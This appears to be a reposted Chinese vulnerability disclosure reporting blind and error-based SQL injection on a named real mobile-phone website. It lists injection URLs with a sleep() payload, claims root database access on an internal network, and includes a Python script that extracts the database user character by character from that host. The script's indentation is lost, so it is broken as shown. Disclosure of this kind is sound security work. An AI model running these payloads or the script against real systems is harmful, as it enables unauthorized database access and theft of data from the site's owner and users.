首页 » 漏洞 » 手机中国某站存在SQL盲注

手机中国某站存在SQL盲注

 

(1)时间盲注

http://dp.cnmo.com/hit_for_dp.php?pro_id=if(1,sleep(3),0)

(2)两处显错

http://dp.cnmo.com/rank_list.php?curstamp=1439074288&page=&status=1&type=1

http://dp.cnmo.com/single_rank.php?page=&type=9

手机中国某站存在SQL盲注

漏洞证明:

猜解user():

code 区域
[email protected] 

root权限,内网

手机中国某站存在SQL盲注

附脚本:

code 区域
#encoding=utf-8



import httplib

import time

import string

import sys

import random

import hashlib

import urllib



headers = {

'Content-Type': 'application/x-www-form-urlencoded',

'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',

}



payloads = list(string.ascii_lowercase)

for i in range(0,10):

payloads.append(str(i))

payloads += ['@','_', '.']



print '[%s] Start to retrive MySQL user' % time.strftime('%H:%M:%S', time.localtime())

user = ''

for i in range(1, 12):

found=False

while found==False:

for payload in payloads:

timeout_count = 0

for j in range(1,3): # 2 times to confirm

try:

conn = httplib.HTTPConnection('dp.cnmo.com', timeout=3)

conn.request(method='GET',

url = "/hit_for_dp.php?pro_id=if(ascii(mid(user(),%s,1))=%s,sleep(6),0)" % (i, ord(payload)),

headers=headers)

conn.getresponse().read()

conn.close()

print '.',

break

except Exception, e:

timeout_count += 1

time.sleep(0.01)

if timeout_count == 2:

user += payload

print '/n[In progress] now user is %s' % user

found = True

break



print '/nFinally, MySQL user is:', user

顺便sqlmap跑下,多库:

手机中国某站存在SQL盲注

修复方案:

过滤或者转义

原文链接:手机中国某站存在SQL盲注,转载请注明来源!

0